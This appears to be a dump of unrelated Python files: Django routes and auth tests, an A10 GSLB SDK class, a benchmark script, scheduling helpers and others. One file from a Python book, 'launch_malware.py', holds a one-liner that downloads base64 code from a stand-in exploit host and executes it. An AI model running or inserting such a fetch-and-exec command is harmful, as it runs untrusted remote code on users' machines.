def get_extended_resources(self, version):
if version == "2.0":
return EXTENDED_ATTRIBUTES_2_0
else:
return {}
@six.add_metaclass(abc.ABCMeta)
class RouterAvailabilityZonePluginBase(object):
@abc.abstractmethod
def get_router_availability_zones(self, router):
"""Return availability zones which a router belongs to."""
| 29.426471
| 75
| 0.682659
|
8d690ddf3760b84d66569e09427be9aed65ed103
| 397
|
py
|
Python
|
usr/urls.py
|
exile-co/Bee
|
ad318f8c126ed461659bd8693112644aef3e56ed
|
[
"MIT"
] | null | null | null |
usr/urls.py
|
exile-co/Bee
|
ad318f8c126ed461659bd8693112644aef3e56ed
|
[
"MIT"
] | null | null | null |
usr/urls.py
|
exile-co/Bee
|
ad318f8c126ed461659bd8693112644aef3e56ed
|
[
"MIT"
] | 1
|
2015-11-09T17:01:59.000Z
|
2015-11-09T17:01:59.000Z
|
# -*- encoding: utf8 -*-
from django.conf.urls import patterns, include, url
urlpatterns = patterns('',
# Examples:
url(r'^login/$', 'usr.views.login'),
url(r'^login/do/$', 'usr.views.login_do'),
url(r'^logout/$', 'usr.views.logout'),
url(r'^pass/cambio/$','usr.views.pass_cambio',name='pass_cambio'),
url(r'^add/cliente/$','usr.views.add_cliente',name='add_cliente')
)
| 28.357143
| 70
| 0.629723
|
24251dc39c1095726d0d4f000cf48e3e54cfd096
| 74
|
py
|
Python
|
PyRL/components/stairs.py
|
LordRhys/Game-Development
|
457fd5d791b302800bbefbd2306c08c2fca8518a
|
[
"MIT"
] | null | null | null |
PyRL/components/stairs.py
|
LordRhys/Game-Development
|
457fd5d791b302800bbefbd2306c08c2fca8518a
|
[
"MIT"
] | null | null | null |
PyRL/components/stairs.py
|
LordRhys/Game-Development
|
457fd5d791b302800bbefbd2306c08c2fca8518a
|
[
"MIT"
] | null | null | null |
class Stairs:
def __init__(self, floor):
self.floor = floor
| 12.333333
| 30
| 0.608108
|
3e37acae112be791330f30d1a483fe509f1f3759
| 3,818
|
py
|
Python
|
functions.py
|
doctorblinch/Experts-schedule-planning
|
e42be8ae2a2f0f7e9269924b77d6f2d2650cbd40
|
[
"MIT"
] | null | null | null |
functions.py
|
doctorblinch/Experts-schedule-planning
|
e42be8ae2a2f0f7e9269924b77d6f2d2650cbd40
|
[
"MIT"
] | 3
|
2021-06-08T21:35:38.000Z
|
2022-01-13T02:45:00.000Z
|
functions.py
|
doctorblinch/Experts-schedule-planning
|
e42be8ae2a2f0f7e9269924b77d6f2d2650cbd40
|
[
"MIT"
] | null | null | null |
import random
import os
def configure_height4graph_from_condition(condition):
min_val = min([i[0] for i in condition])
max_val = max([i[1] for i in condition])
height_lines = [[0] * (max_val + 1) for i in range(len(condition))]
new_condition = []
for section in condition:
layer = layer_that_can_be_added(height_lines, section)
new_condition.append((section[0], section[1], layer))
return new_condition
def layer_that_can_be_added(height_lines, value):
start, finish = value
if start != 0:
start -= 1
can_be_added = False
layer = 0
while not can_be_added:
for i in height_lines[layer][start:finish + 1]:
if i == 1:
layer += 1
can_be_added = False
break
else:
can_be_added = True
else:
for i in range(start, finish + 1):
height_lines[layer][i] = 1
return layer
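

# Worked example (added): configure_height4graph_from_condition assigns each
# interval the lowest layer where it does not collide with an already-placed
# one (the start-1 adjustment also makes merely adjacent intervals collide):
#     configure_height4graph_from_condition([(1, 4), (2, 6), (5, 8)])
#     -> [(1, 4, 0), (2, 6, 1), (5, 8, 2)]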
def create_file_with_condition(condition):
names = {name for root, dirs, files in os.walk('data/input_files') for name in files}
available_name_found = False
skeleton = 'condition_{}.csv'
i = 1
while not available_name_found:
if skeleton.format(i) not in names:
available_name_found = True
            with open('data/input_files/' + skeleton.format(i), 'w') as f:
                # Use a separate loop variable so the filename counter `i`
                # is not shadowed while writing the sections.
                for section in condition:
                    f.write('{},{}\n'.format(section[0], section[1]))
else:
i += 1
def markdown2string(file_path):
with open(file_path, 'r') as f:
string = f.read()
return string
def parse_condition_csv(path):
experts = []
try:
with open(path, 'r') as f:
lines = f.readlines()
for line in lines:
experts.append(
tuple(map(int, line.strip().split(',')))
)
except:
return 'Wrong file format!'
return experts
def generate_random_condition(quantity, min_val, max_val, distribution, max_len):
condition = []
    if distribution == 'Усічений нормальний':  # "Truncated normal"
for _ in range(quantity):
a = 0
b = 0
while a == b:
a = int(random.normalvariate((max_val + min_val) / 2, (max_val + min_val) / 5))
b = int(random.normalvariate((max_val + min_val) / 2, (max_val + min_val) / 5))
a = max_val if a > max_val else a
a = min_val if a < min_val else a
b = max_val if b > max_val else b
b = min_val if b < min_val else b
a, b = min(a, b), max(a, b)
if b - a > max_len:
delta = int((b - a - max_len) / 2)
b -= delta
a += delta
condition.append((a, b))
    elif distribution == 'Рівномірний':  # "Uniform"
for _ in range(quantity):
a = 0
b = 0
while a == b:
a = random.randint(min_val, max_val - 1)
b = random.randint(min_val + 1, max_val)
a, b = min(a, b), max(a, b)
if b - a > max_len:
delta = int((b - a - max_len) / 2)
b -= delta
a += delta
condition.append((a, b))
    elif distribution == 'Рівномірний для відрізків обмеженної довжини':  # "Uniform for segments of bounded length"
for _ in range(quantity):
a = random.randint(min_val, max_val - 1)
b = a + random.randint(1, max_len)
b = max_val if b > max_val else b
condition.append((a, b))
return condition
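

# Hypothetical usage (added; the Ukrainian strings above are the distribution
# keys the caller passes in -- 'Рівномірний' is the uniform one):
#     cond = generate_random_condition(9, 1, 40, 'Рівномірний', 10)
#     create_file_with_condition(cond)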
# EXPERTS = [(1, 14), (2, 7), (7, 16), (14, 22), (18, 28), (25, 30), (28, 35), (30, 34), (34, 40)]
# EXPERTS = [(2, 4), (2, 4), (5, 7), (2, 4)]
# print(configure_height4graph_from_condition(EXPERTS))
| 30.790323
| 98
| 0.51912
|
113e7d0c353257ef8ea9ed15f58d280b757b78ae
| 15,560
|
py
|
Python
|
a10sdk/core/gslb/gslb_zone_service.py
|
deepfield/a10sdk-python
|
bfaa58099f51f085d5e91652d1d1a3fd5c529d5d
|
[
"Apache-2.0"
] | 16
|
2015-05-20T07:26:30.000Z
|
2021-01-23T11:56:57.000Z
|
a10sdk/core/gslb/gslb_zone_service.py
|
deepfield/a10sdk-python
|
bfaa58099f51f085d5e91652d1d1a3fd5c529d5d
|
[
"Apache-2.0"
] | 6
|
2015-03-24T22:07:11.000Z
|
2017-03-28T21:31:18.000Z
|
a10sdk/core/gslb/gslb_zone_service.py
|
deepfield/a10sdk-python
|
bfaa58099f51f085d5e91652d1d1a3fd5c529d5d
|
[
"Apache-2.0"
] | 23
|
2015-03-29T15:43:01.000Z
|
2021-06-02T17:12:01.000Z
|
from a10sdk.common.A10BaseClass import A10BaseClass
class HealthCheckPort(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param health_check_port: {"description": "Check Related Port Status (Port Number)", "minimum": 0, "type": "number", "maximum": 65534, "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "health-check-port"
self.DeviceProxy = ""
self.health_check_port = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class SamplingEnable(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param counters1: {"enum": ["all", "received-query", "sent-response", "proxy-mode-response", "cache-mode-response", "server-mode-response", "sticky-mode-response", "backup-mode-response"], "type": "string", "description": "'all': all; 'received-query': Number of DNS queries received for the service; 'sent-response': Number of DNS replies sent to clients for the service; 'proxy-mode-response': Number of DNS replies sent to clients by the ACOS device as a DNS proxy for the service; 'cache-mode-response': Number of cached DNS replies sent to clients by the ACOS device for the service. (This statistic applies only if the DNS cache; 'server-mode-response': Number of DNS replies sent to clients by the ACOS device as a DNS server for the service. (This statistic applies only if the D; 'sticky-mode-response': Number of DNS replies sent to clients by the ACOS device to keep the clients on the same site. (This statistic applies only if; 'backup-mode-response': help Number of DNS replies sent to clients by the ACOS device in backup mode; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "sampling-enable"
self.DeviceProxy = ""
self.counters1 = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Service(A10BaseClass):
"""Class Description::
Service information for the GSLB zone.
Class service supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param forward_type: {"optional": true, "enum": ["both", "query", "response"], "type": "string", "description": "'both': Forward both query and response; 'query': Forward query; 'response': Forward response; ", "format": "enum"}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param health_check_port: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "health-check-port": {"description": "Check Related Port Status (Port Number)", "minimum": 0, "type": "number", "maximum": 65534, "format": "number"}}}]}
:param policy: {"description": "Specify policy for this service (Specify policy name)", "format": "string", "minLength": 1, "maxLength": 63, "optional": true, "default-depends-on": "gslb.zone::policy", "type": "string"}
:param dns_txt_record_list: {"minItems": 1, "items": {"type": "dns-txt-record"}, "uniqueItems": true, "array": [{"required": ["record-name"], "properties": {"uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "record-name": {"description": "Specify the Object Name for TXT Data", "format": "string", "minLength": 1, "optional": false, "maxLength": 63, "type": "string"}, "txt-data": {"description": "Specify TXT Data", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 1000, "type": "string"}, "ttl": {"description": "Specify TTL", "format": "number", "default": 0, "optional": true, "maximum": 2147483647, "minimum": 0, "type": "number"}}}], "type": "array", "$ref": "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-txt-record/{record-name}"}
:param service_port: {"description": "Port number of the service", "format": "number", "type": "number", "maximum": 65534, "minimum": 0, "optional": false}
:param dns_mx_record_list: {"minItems": 1, "items": {"type": "dns-mx-record"}, "uniqueItems": true, "array": [{"required": ["mx-name"], "properties": {"priority": {"description": "Specify Priority", "format": "number", "type": "number", "maximum": 65535, "minimum": 0, "optional": true}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "mx-name": {"description": "Specify Domain Name", "format": "string", "minLength": 1, "optional": false, "maxLength": 127, "type": "string"}, "ttl": {"description": "Specify TTL", "format": "number", "default": 0, "optional": true, "maximum": 2147483647, "minimum": 0, "type": "number"}}}], "type": "array", "$ref": "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-mx-record/{mx-name}"}
:param dns_record_list: {"minItems": 1, "items": {"type": "dns-record"}, "uniqueItems": true, "array": [{"required": ["type"], "properties": {"data": {"description": "Specify DNS Data", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 512, "type": "string"}, "type": {"description": "Specify DNS Type", "format": "number", "type": "number", "maximum": 65535, "minimum": 1, "optional": false}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}}}], "type": "array", "$ref": "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-record/{type}"}
:param dns_ns_record_list: {"minItems": 1, "items": {"type": "dns-ns-record"}, "uniqueItems": true, "array": [{"required": ["ns-name"], "properties": {"sampling-enable": {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "counters1": {"enum": ["all", "hits"], "type": "string", "description": "'all': all; 'hits': Number of times the record has been used; ", "format": "enum"}}}]}, "ns-name": {"description": "Specify Domain Name", "format": "string", "minLength": 1, "optional": false, "maxLength": 127, "type": "string"}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "ttl": {"description": "Specify TTL", "format": "number", "default": 0, "optional": true, "maximum": 2147483647, "minimum": 0, "type": "number"}}}], "type": "array", "$ref": "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-ns-record/{ns-name}"}
:param health_check_gateway: {"description": "'enable': Enable Gateway Status Check; 'disable': Disable Gateway Status Check; ", "format": "enum", "default": "enable", "type": "string", "enum": ["enable", "disable"], "optional": true}
:param sampling_enable: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "counters1": {"enum": ["all", "received-query", "sent-response", "proxy-mode-response", "cache-mode-response", "server-mode-response", "sticky-mode-response", "backup-mode-response"], "type": "string", "description": "'all': all; 'received-query': Number of DNS queries received for the service; 'sent-response': Number of DNS replies sent to clients for the service; 'proxy-mode-response': Number of DNS replies sent to clients by the ACOS device as a DNS proxy for the service; 'cache-mode-response': Number of cached DNS replies sent to clients by the ACOS device for the service. (This statistic applies only if the DNS cache; 'server-mode-response': Number of DNS replies sent to clients by the ACOS device as a DNS server for the service. (This statistic applies only if the D; 'sticky-mode-response': Number of DNS replies sent to clients by the ACOS device to keep the clients on the same site. (This statistic applies only if; 'backup-mode-response': help Number of DNS replies sent to clients by the ACOS device in backup mode; ", "format": "enum"}}}]}
:param disable: {"default": 0, "optional": true, "type": "number", "description": "Disable", "format": "flag"}
:param dns_srv_record_list: {"minItems": 1, "items": {"type": "dns-srv-record"}, "uniqueItems": true, "array": [{"required": ["srv-name", "port"], "properties": {"srv-name": {"description": "Specify Domain Name", "format": "string", "minLength": 1, "optional": false, "maxLength": 127, "type": "string"}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "weight": {"description": "Specify Weight, default is 10", "format": "number", "default": 10, "optional": true, "maximum": 100, "minimum": 1, "type": "number"}, "priority": {"description": "Specify Priority", "format": "number", "type": "number", "maximum": 65535, "minimum": 0, "optional": true}, "ttl": {"description": "Specify TTL", "format": "number", "type": "number", "maximum": 2147483647, "minimum": 0, "optional": true}, "port": {"description": "Specify Port (Port Number)", "format": "number", "type": "number", "maximum": 65534, "minimum": 0, "optional": false}}}], "type": "array", "$ref": "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-srv-record/{srv-name}+{port}"}
:param service_name: {"description": "Specify the service name for the zone, * for wildcard", "format": "string-rlx", "minLength": 1, "optional": false, "maxLength": 63, "type": "string"}
:param action: {"optional": true, "enum": ["drop", "forward", "ignore", "reject"], "type": "string", "description": "'drop': Drop query; 'forward': Forward packet; 'ignore': Send empty response; 'reject': Send refuse response; ", "format": "enum"}
:param dns_ptr_record_list: {"minItems": 1, "items": {"type": "dns-ptr-record"}, "uniqueItems": true, "array": [{"required": ["ptr-name"], "properties": {"ptr-name": {"description": "Specify Domain Name", "format": "string", "minLength": 1, "optional": false, "maxLength": 127, "type": "string"}, "sampling-enable": {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "counters1": {"enum": ["all", "hits"], "type": "string", "description": "'all': all; 'hits': Number of times the record has been used; ", "format": "enum"}}}]}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "ttl": {"description": "Specify TTL", "format": "number", "default": 0, "optional": true, "maximum": 2147483647, "minimum": 0, "type": "number"}}}], "type": "array", "$ref": "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-ptr-record/{ptr-name}"}
:param dns_cname_record_list: {"minItems": 1, "items": {"type": "dns-cname-record"}, "uniqueItems": true, "array": [{"required": ["alias-name"], "properties": {"as-backup": {"default": 0, "optional": true, "type": "number", "description": "As backup when fail", "format": "flag"}, "alias-name": {"description": "Specify the alias name", "format": "string", "minLength": 1, "optional": false, "maxLength": 127, "type": "string"}, "admin-preference": {"description": "Specify Administrative Preference, default is 100", "format": "number", "default": 100, "optional": true, "maximum": 255, "minimum": 0, "type": "number"}, "weight": {"description": "Specify Weight, default is 1", "format": "number", "default": 1, "optional": true, "maximum": 100, "minimum": 1, "type": "number"}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}}}], "type": "array", "$ref": "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/dns-cname-record/{alias-name}"}
:param geo_location_list: {"minItems": 1, "items": {"type": "geo-location"}, "uniqueItems": true, "array": [{"required": ["geo-name"], "properties": {"forward-type": {"optional": true, "enum": ["both", "query", "response"], "type": "string", "description": "'both': Forward both query and response; 'query': Forward query from this geo-location; 'response': Forward response to this geo-location; ", "format": "enum"}, "uuid": {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}, "alias": {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"alias": {"minLength": 1, "maxLength": 127, "type": "string", "description": "Send CNAME response for this geo-location (Specify a CNAME record)", "format": "string"}, "optional": true}}]}, "action-type": {"optional": true, "enum": ["allow", "drop", "forward", "ignore", "reject"], "type": "string", "description": "'allow': Allow query from this geo-location; 'drop': Drop query from this geo-location; 'forward': Forward packet for this geo-location; 'ignore': Send empty response to this geo-location; 'reject': Send refuse response to this geo-location; ", "format": "enum"}, "policy": {"description": "Policy for this geo-location (Specify the policy name)", "format": "string", "minLength": 1, "optional": true, "maxLength": 63, "not": "action", "type": "string"}, "action": {"description": "Action for this geo-location", "format": "flag", "default": 0, "optional": true, "not": "policy", "type": "number"}, "geo-name": {"description": "Specify the geo-location", "format": "string", "minLength": 1, "optional": false, "maxLength": 127, "type": "string"}}}], "type": "array", "$ref": "/axapi/v3/gslb/zone/{name}/service/{service-port}+{service-name}/geo-location/{geo-name}"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/gslb/zone/{name}/service/{service_port}+{service_name}`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required = [ "service_port","service_name"]
self.b_key = "service"
self.a10_url="/axapi/v3/gslb/zone/{name}/service/{service_port}+{service_name}"
self.DeviceProxy = ""
self.dns_a_record = {}
self.forward_type = ""
self.uuid = ""
self.health_check_port = []
self.policy = ""
self.dns_txt_record_list = []
self.service_port = ""
self.dns_mx_record_list = []
self.dns_record_list = []
self.dns_ns_record_list = []
self.health_check_gateway = ""
self.sampling_enable = []
self.disable = ""
self.dns_srv_record_list = []
self.service_name = ""
self.action = ""
self.dns_ptr_record_list = []
self.dns_cname_record_list = []
self.geo_location_list = []
for keys, value in kwargs.items():
setattr(self,keys, value)
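

# Hypothetical usage sketch (added; device-proxy construction and the exact
# CRUD helper names inherited from A10BaseClass are assumed -- see
# a10sdk.common.device_proxy for the real session handling):
#     svc = Service(service_port=80, service_name="www", name="example.com",
#                   DeviceProxy=device_proxy)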
| 134.137931
| 1,884
| 0.650514
|
63f157f611a0334f7d417fea677663af928b2695
| 145
|
py
|
Python
|
Chapter08/launch_malware.py
|
PacktPublishing/Secret-Recipes-of-the-Python-Ninja
|
805d00c7a54927ba94c9077e9a580508ee3c5e56
|
[
"MIT"
] | 13
|
2018-06-21T01:44:49.000Z
|
2021-12-01T10:49:53.000Z
|
Chapter08/launch_malware.py
|
PacktPublishing/Secret-Recipes-of-the-Python-Ninja
|
805d00c7a54927ba94c9077e9a580508ee3c5e56
|
[
"MIT"
] | null | null | null |
Chapter08/launch_malware.py
|
PacktPublishing/Secret-Recipes-of-the-Python-Ninja
|
805d00c7a54927ba94c9077e9a580508ee3c5e56
|
[
"MIT"
] | 6
|
2018-10-05T08:29:24.000Z
|
2022-01-11T14:49:50.000Z
|
python -c "import urllib.request, base64;
exec(base64.b64decode(
urllib.request.urlopen('http://my-exploit/py.b64')
).decode())"
| 29
| 58
| 0.655172
|
198846de8598e9f7e25c7f8350f8a990e12a8397
| 1,629
|
py
|
Python
|
examples/benchmarks/pytorch_cnn.py
|
yangpanMS/superbenchmark
|
4d85630abba0fe45b8cd3a51e79c15e6ac87a1e6
|
[
"MIT"
] | 59
|
2021-04-12T09:44:23.000Z
|
2022-03-27T14:33:46.000Z
|
examples/benchmarks/pytorch_cnn.py
|
yangpanMS/superbenchmark
|
4d85630abba0fe45b8cd3a51e79c15e6ac87a1e6
|
[
"MIT"
] | 275
|
2021-03-29T06:40:34.000Z
|
2022-03-30T07:35:49.000Z
|
examples/benchmarks/pytorch_cnn.py
|
yangpanMS/superbenchmark
|
4d85630abba0fe45b8cd3a51e79c15e6ac87a1e6
|
[
"MIT"
] | 24
|
2021-04-09T12:42:27.000Z
|
2022-03-16T08:26:34.000Z
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
"""Model benchmark example for CNN models.
Commands to run:
python3 examples/benchmarks/pytorch_cnn.py (Single GPU)
python3 -m torch.distributed.launch --use_env --nproc_per_node=8 examples/benchmarks/pytorch_cnn.py \
--distributed (Distributed)
"""
import argparse
from superbench.benchmarks import Platform, Framework, BenchmarkRegistry
from superbench.common.utils import logger
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--distributed', action='store_true', default=False, help='Whether to enable distributed training.'
)
args = parser.parse_args()
# Specify the model name and benchmark parameters.
# For example, resnet50, resnet101, resnet152, densenet169, densenet201, vgg11, vgg13, vgg16, vgg19.
model_name = 'resnet101'
parameters = '--batch_size 192 --precision float32 float16 --num_warmup 64 --num_steps 512 \
--sample_count 8192 --pin_memory'
if args.distributed:
parameters += ' --distributed_impl ddp --distributed_backend nccl'
    # Create context for the resnet101 benchmark and run it for 512 steps (per --num_steps above).
context = BenchmarkRegistry.create_benchmark_context(
model_name, platform=Platform.CUDA, parameters=parameters, framework=Framework.PYTORCH
)
benchmark = BenchmarkRegistry.launch_benchmark(context)
if benchmark:
logger.info(
'benchmark: {}, return code: {}, result: {}'.format(
benchmark.name, benchmark.return_code, benchmark.result
)
)
| 36.2
| 107
| 0.711479
|
315b2db44b7d2b3607c5822a15c032a0d0d4de66
| 878
|
py
|
Python
|
app/test.py
|
GuilhermeJC13/storIA
|
eeecbe9030426f70c6aa73ca0ce8382860c8495c
|
[
"MIT"
] | 4
|
2021-07-27T23:39:02.000Z
|
2021-09-23T04:17:08.000Z
|
app/test.py
|
GuilhermeJC13/storIA
|
eeecbe9030426f70c6aa73ca0ce8382860c8495c
|
[
"MIT"
] | null | null | null |
app/test.py
|
GuilhermeJC13/storIA
|
eeecbe9030426f70c6aa73ca0ce8382860c8495c
|
[
"MIT"
] | 3
|
2021-07-27T17:33:58.000Z
|
2021-07-29T12:46:59.000Z
|
import requests
API_URL = "https://api-inference.huggingface.co/models/Felipehonorato/storIA"
headers = {"Authorization": "Bearer api_CwzaLVoNBMVQhviuBtnxxdVoXvQgjuTEmW"}
def remove_token(text):
return " ".join(text.split()[1:])
def check_token(input):
token = '<|startoftext|> '
if input.split()[0] != token:
return token + input
else:
return input
def query(payload):
response = requests.post(API_URL, headers=headers, json=payload)
return response.json()
input = 'it was a dark night'  # USER-PROVIDED TEXT
input_len = len(input.split())
size = 50  # SET BY THE USER; DEFAULT 50
input = check_token(input)
output = query({"inputs": input,
"parameters": {"max_length": 50, 'repetition_penalty': float(1.2), 'num_beams':5,
'no_repeat_ngram_size':3, 'max_length':input_len + size}})
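# A hedged sketch of consuming `output`: the Hugging Face Inference API
# typically returns a list like [{"generated_text": "..."}] for text
# generation, or a dict carrying an "error" key while the model loads,
# so guard both cases before stripping the start token:
if isinstance(output, list) and output and "generated_text" in output[0]:
    story = remove_token(output[0]["generated_text"])
    print(story)
else:
    print("Unexpected response:", output)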
| 33.769231
| 98
| 0.664009
|
1239c5d3f5872e98ab9312ec109c802e090c4906
| 2,256
|
py
|
Python
|
tests/controllers/test_citation_controller.py
|
Medisur/journalmanagement
|
bc356e8d3354529a14a5e04bec3d80c03ed1c0ec
|
[
"MIT"
] | 1
|
2019-04-16T08:53:16.000Z
|
2019-04-16T08:53:16.000Z
|
tests/controllers/test_citation_controller.py
|
Medisur/journalmanagement
|
bc356e8d3354529a14a5e04bec3d80c03ed1c0ec
|
[
"MIT"
] | null | null | null |
tests/controllers/test_citation_controller.py
|
Medisur/journalmanagement
|
bc356e8d3354529a14a5e04bec3d80c03ed1c0ec
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from gluon.html import URL
from gluon.storage import Storage
import json
def dict_to_storage(dictionary):
"""
Converts recursively a dictionary to a storage object
"""
new_storage = Storage(dictionary)
def list_dicts_to_storage(st_list):
for i, a in enumerate(st_list):
if isinstance(a,list):
st_list[i] = list_dicts_to_storage(a)
elif isinstance(a,dict):
st_list[i] = dict_to_storage(a)
return st_list
for key in new_storage:
if isinstance(new_storage[key],dict):
new_storage[key] = dict_to_storage(new_storage[key])
elif isinstance(new_storage[key],list):
new_storage[key] = list_dicts_to_storage(new_storage[key])
return new_storage
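# A small illustration (not exercised by the tests below): nesting converts
# recursively, so attribute access works at any depth.
#
#     data = dict_to_storage({'a': {'b': [{'c': 1}]}})
#     assert data.a.b[0].c == 1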
def check_api_header(response_object, web2py):
header = dict_to_storage(response_object.header)
assert web2py.request.application in header.application
assert 'Citations' in header.api
assert '1' == header.version
def test_citation_to_csl_json_api(client, web2py):
vars = {
'id': 'ASD1',
'type': 'article-journal',
'author': 'Rodriguez G., Gonzales Pepe',
'issued': '2017/6/02',
'issue': '2',
'number': '3',
'URL': "http://pepe.com"
}
url = URL('citation', 'api', 'to_csl_json', vars=vars)
client.get(url) # get a page
assert client.status == 200
response_object = dict_to_storage(json.loads(client.text))
check_api_header(response_object, web2py)
assert response_object.data.number == '3'
assert response_object.data.id == 'ASD1'
assert response_object.data.issue == '2'
assert response_object.data.type == 'article-journal'
assert response_object.data.URL == 'http://pepe.com'
assert response_object.data.author[0].family == 'Rodriguez'
assert response_object.data.author[0].given == 'G.'
assert response_object.data.author[1].family == 'Gonzales'
assert response_object.data.author[1].given == 'Pepe'
assert response_object.data.issued[0]['date-parts'][0] == '2017'
assert response_object.data.issued[0]['date-parts'][1] == '6'
assert response_object.data.issued[0]['date-parts'][2] == '2'
| 32.228571
| 70
| 0.656028
|
cf412c96e6b1a54a4991358ee02401f39db1b3a8
| 5,479
|
py
|
Python
|
django/contrib/auth/tests/test_models.py
|
izquierdo/django
|
9a2b07f1b45741da39a7606474aec3548780032b
|
[
"BSD-3-Clause"
] | null | null | null |
django/contrib/auth/tests/test_models.py
|
izquierdo/django
|
9a2b07f1b45741da39a7606474aec3548780032b
|
[
"BSD-3-Clause"
] | null | null | null |
django/contrib/auth/tests/test_models.py
|
izquierdo/django
|
9a2b07f1b45741da39a7606474aec3548780032b
|
[
"BSD-3-Clause"
] | null | null | null |
import warnings
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.models import (Group, User, SiteProfileNotAvailable,
UserManager)
from django.contrib.auth.tests.utils import skipIfCustomUser
from django.test import TestCase
from django.test.utils import override_settings
from django.utils import six
@skipIfCustomUser
@override_settings(USE_TZ=False, AUTH_PROFILE_MODULE='')
class ProfileTestCase(TestCase):
def test_site_profile_not_available(self):
user = User.objects.create(username='testclient')
# calling get_profile without AUTH_PROFILE_MODULE set
del settings.AUTH_PROFILE_MODULE
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
with six.assertRaisesRegex(self, SiteProfileNotAvailable,
"You need to set AUTH_PROFILE_MODULE in your project"):
user.get_profile()
# Bad syntax in AUTH_PROFILE_MODULE:
settings.AUTH_PROFILE_MODULE = 'foobar'
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
with six.assertRaisesRegex(self, SiteProfileNotAvailable,
"app_label and model_name should be separated by a dot"):
user.get_profile()
# module that doesn't exist
settings.AUTH_PROFILE_MODULE = 'foo.bar'
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
with six.assertRaisesRegex(self, SiteProfileNotAvailable,
"Unable to load the profile model"):
user.get_profile()
@skipIfCustomUser
@override_settings(USE_TZ=False)
class NaturalKeysTestCase(TestCase):
fixtures = ['authtestdata.json']
def test_user_natural_key(self):
staff_user = User.objects.get(username='staff')
self.assertEqual(User.objects.get_by_natural_key('staff'), staff_user)
self.assertEqual(staff_user.natural_key(), ('staff',))
def test_group_natural_key(self):
users_group = Group.objects.create(name='users')
self.assertEqual(Group.objects.get_by_natural_key('users'), users_group)
@skipIfCustomUser
@override_settings(USE_TZ=False)
class LoadDataWithoutNaturalKeysTestCase(TestCase):
fixtures = ['regular.json']
def test_user_is_created_and_added_to_group(self):
user = User.objects.get(username='my_username')
group = Group.objects.get(name='my_group')
self.assertEqual(group, user.groups.get())
@skipIfCustomUser
@override_settings(USE_TZ=False)
class LoadDataWithNaturalKeysTestCase(TestCase):
fixtures = ['natural.json']
def test_user_is_created_and_added_to_group(self):
user = User.objects.get(username='my_username')
group = Group.objects.get(name='my_group')
self.assertEqual(group, user.groups.get())
@skipIfCustomUser
class UserManagerTestCase(TestCase):
def test_create_user(self):
email_lowercase = 'normal@normal.com'
user = User.objects.create_user('user', email_lowercase)
self.assertEqual(user.email, email_lowercase)
self.assertEqual(user.username, 'user')
self.assertFalse(user.has_usable_password())
def test_create_user_email_domain_normalize_rfc3696(self):
# According to http://tools.ietf.org/html/rfc3696#section-3
# the "@" symbol can be part of the local part of an email address
returned = UserManager.normalize_email(r'Abc\@DEF@EXAMPLE.com')
self.assertEqual(returned, r'Abc\@DEF@example.com')
def test_create_user_email_domain_normalize(self):
returned = UserManager.normalize_email('normal@DOMAIN.COM')
self.assertEqual(returned, 'normal@domain.com')
def test_create_user_email_domain_normalize_with_whitespace(self):
returned = UserManager.normalize_email('email\ with_whitespace@D.COM')
